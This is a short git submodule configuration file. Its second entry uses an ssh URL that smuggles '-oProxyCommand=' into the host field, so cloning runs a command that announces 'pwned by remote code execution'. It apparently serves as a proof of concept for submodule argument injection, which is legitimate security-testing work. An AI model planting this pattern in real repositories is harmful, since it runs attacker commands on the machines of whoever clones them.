[submodule "crackers"]
  path = include/crackers
  url = "https://github.com/GrahamMThomas/Crackers.git"
[submodule "hack"]
	path = include/hack
	url = "ssh://-oProxyCommand=say\ pwned\ by\ remote\ code\ execution/wat"
